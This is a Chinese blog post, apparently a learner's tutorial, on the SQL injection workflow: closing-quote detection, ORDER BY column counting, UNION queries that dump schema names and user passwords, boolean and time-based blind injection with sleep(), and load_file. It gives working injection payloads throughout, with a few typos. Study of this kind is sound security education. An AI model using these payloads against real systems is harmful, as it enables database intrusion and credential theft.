SQL注入的流程及联合查询、布尔盲注、时间注入

最新推荐文章于 2024-07-25 12:41:16 发布
最新推荐文章于 2024-07-25 12:41:16 发布
阅读量547 收藏
点赞数
分类专栏: 网络安全 文章标签: sql 数据库 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73180072/article/details/128161418
版权

SQL注入流程

挖掘漏洞的基本理念:输入一个信息,根据服务器返回的一个信息,进行分析,采取下一步的信息
1.利用?传播参数,查看返回结果
2.猜测闭合方式一般为' " ') ")猜测输入的闭合符是否有效是否影响了SQL语句的执行
3.输入\转义符可以判断闭合方式
4.判断表里面的字段数量可以采用函数order by 参数 按照第几列排序
select * from user where id="1" order by 1
select * from user where id="1" order by 2
select * from user where id="1" order by 3
如果服务器输出错误信息说明不存在该列,无法按照该列排序
一定要把前面的参数闭合再输入order by 参数(依据参数正向排列 order by 参数 desc依据参数倒序排列)
同时输入-- 注释掉后面的闭合符号
5.确定字段数量后,需要再次确定显示位

联合查询(有回显)

union函数:拼接两条查询语句
select * from users where id=1 union select * from users where id=2
1.union需要保持查询的字段数量一致
2.联合查询一般都是有回显的时候使用,users表有三个字段,需要在确定显示数量后确定显示位,需要使前面字段无法输出才能输出后面的显示位
select * from users where id=-1 union select 1,2,3 -- +
3.在显示位进行其他函数的操作
\version() #数据库版本 user() #数据库用户名 database()#数据库名称 @@datadir#数据库路径 @@version_compile_os#操作系统版本
通过联合查询数据库的名称

group_concat函数把输出值拼接为一条函数

爆库

select 1,group_concat(SCHEMA_NAME) ,3 from information_schema.SCHEMATA;

爆表

select 1,group_concat(TABLE_NAME) ,3 from information_schema.TABLES where SCHEMA_NAME='security';

爆字段

select 1,group_concat(CLOUMN_NAME) ,3 from information_schema.CLOUMNS where SCHEMA_NAME='security' and TABLE_NAME="users" ;

爆字段中的值

select group_concat("用户名",username,"密码",password,"<\br>") from 表名

布尔盲注(服务器只能返回真假两个信息)

如果联合查询没有返回信息的时候就需要采用盲注(可以采用sqlmap进行爆破)
SQL注入利用回显的真假,判断信息
1.判断闭合方式,输入判断语句
2.利用length()函数和database()函数判断数据库的名称长度,利用ASCII表和函数ascii()函数substr((),截取位数,截取个数)判断数据库的名称同时可以利用>与<二分法来进行猜测
?id=1 and (length(database())=8)两侧都为真返回真
?id=1 and (ascii(substr(database(),1,1))>65)
ascii码表 请点击此处查看
3.爆破表名
4.爆破字段名

时间盲注

在盲注的基础上利用if(条件,命令1,命令2)函数条件为真执行1,条件为假执行2
sleep(秒数)sleep函数增加响应时间
如果条件成功了可以使用增加响应函数
if((ascii(substr(database(),1,1))=115),sleep(5),1)

SQL注入的读写文件

load file("文件路径")可以结合有回显的进行

TIME908
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全SQL注入--时间注入
边缘拼命划水的小陈
04-06 654
使用默认模式 自动为y。获取当前使用的数据库
基于SQL布尔盲注联合查询的WEB渗透
毕业作品网站
09-14 275
容器隔离具有局限性,不同容器拥有相同的目录映射时,会增大攻击面,可能会导致容器间的攻击外部用户拥有站点根目录的写入权限时,给getshell创造了可能务的地方就有攻击面…自己编写服务程序时需要多加注意,努力减小攻击面容器隔离具有局限性,不同容器拥有相同的目录映射时,会增大攻击面,可能会导致容器间的攻击外部用户拥有站点根目录的写入权限时,给getshell创造了可能Mysql服务开启任意文件读写后需及时关闭,否则极大增加攻击面。
sql注入-联合注入
tlucky的博客
04-10 718
1.第一关 (1)根据提示输入id (2)求闭合字符 使用单引号出现报错,说明闭合字符为单引号 (3)求字段数 为3时显示正常 ,字段数为3 (4)求回显字段 回显字段为2,3 (5)爆数据库名 (6)爆表名 (5)爆列名 (8)爆字段名 2. 第二关 (1)求闭合字符 可判断为数值型注入 (2)确定字段数 字段数为3 (3)确定回显数 回显位为2,3 (4)爆数据库名 (5)爆表名 (6)爆列名 (7)爆字段名 3. 第三关 (1)求注入类型 加)试一下,
SQL注入盲注布尔时间)手工注入和半自动化注入
qq_60463414的博客
08-01 1598
SQL注入盲注布尔时间)手工注入和半自动化注入
SQL注入-盲注布尔盲注时间盲注
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
SQL注入之基于布尔盲注详解
09-10
布尔SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
第16天:WEB漏洞-SQL注入查询方式及报错盲注1
08-03
本话题主要关注的是在没有直接回显的情况下如何进行SQL注入,特别是通过查询方式和报错盲注技术。 **查询方式**: 1. **SELECT查询**:通常用于从数据库中检索数据,例如`select * from news where id=$id`。这里的...
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入基础知识点 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造...
渗透测试-SQL注入布尔盲注时间盲注
lza20001103的博客
04-20 2843
渗透测试-SQL注入布尔盲注时间盲注
多表查询(内连接与外连接的混合使用)(union联合)
夜一
09-09 1万+
select*from表1 left other join 表2 on 条件 inner join 表3 on条件 如: SELECT e.* ,d.dname 部门名称,m.ename 上级领导 ,s.grade 工资等级 FROM emp e LEFT OUTER JOIN emp m ON e.mgr=m.id INNER JOIN dept d ON e.dept_...
SQL注入实战之盲注篇(布尔时间盲注
m0_51428325的博客
11-16 4279
首先还是写一下核心的语句吧。 information_schema schemata(schema_name) tables(table_schema,table_name) columns(table_schema,table_name,column_name) select schema_name from information_schema.schemata; select table_name from information_schema.tables where table_
数据库联合查询
理应热爱生活的博客
09-14 2516
一,union联合 合并:将多条查询语句的结果合并成一个结果。 语法就是 查询语句一 union 查询语句二 引入的案例:查询部门编号大于九十,或者邮箱包含a的员工信息 select * from emp where deptno>90 or email like"%a%"; select * from emp where deptno>90 union select * from emp where email like"%a%"; 应用场景: 案例二:查..
什么时候使用关联查询
zcl1199的博客
04-24 802
1.如果需要关联查询出的数据量很大,不能在for循环中一个一个关联查询的!!!由于数据量大,需要关联其它表查询速度慢。 2.如果需要关联查询出的数据量小,可以for循环(一页的数据)中关联查询,并且通过主键或索引查询,性能没有影响。
联合查询什么时候索引能用到,举例说明
岛田悠米
04-07 157
联合索引(a,b,c):
Sqli-labs-master的21—25通关教程
最新发布
weixin_68416970的博客
07-25 823
Sqli-labs-master靶场的21、22、23、24、25关教程
SQL进阶:解锁高级特性,深化数据洞察
WayneYalejk的博客
07-24 422
掌握了SQL的基础知识后,进一步探索其高级特性将帮助您更高效地处理复杂数据,深化数据分析的广度和深度。本文将带您领略SQL的高级功能,包括窗口函数、存储过程、触发器以及高级查询技巧等,让您在数据处理的道路上更进一步。通过这两篇文章,读者可以从SQL的基础知识逐步深入到高级特性,全面掌握SQL在数据处理和分析中的强大能力。
sql注入布尔盲注流程
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上可以接收用户输入的地方,如表单、URL参数等,这些地方可能存在SQL查询。 2. **构造基础查询**:创建一个基本的查询语句,通常是检测一个特定值(例如用户是否存在)的存在,通常是一个简单的`SELECT * FROM table WHERE column = 'value'`。 3. **提交测试数据**:在查询中替换'value'为潜在的恶意输入,例如`'1'`或`'1 OR 1=1'`。'1'会返回所有结果,而`'1 OR 1=1'`在大多数情况下会返回所有数据,因为布尔条件为真。 4. **观察响应**:根据服务器返回的结果,判断原始查询条件是否满足。如果服务器返回预期的结果(如所有数据),则说明条件成立;反之,如果返回空结果或异常,则条件不成立。 5. **迭代调整**:根据响应调整恶意输入,例如尝试否定条件(如`'1 OR 1=0'`),直到找到正确的布尔表达式。 6. **解析结果**:利用布尔表达式的真假来推断数据库中的敏感信息,例如是否存在特定记录、字段值等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值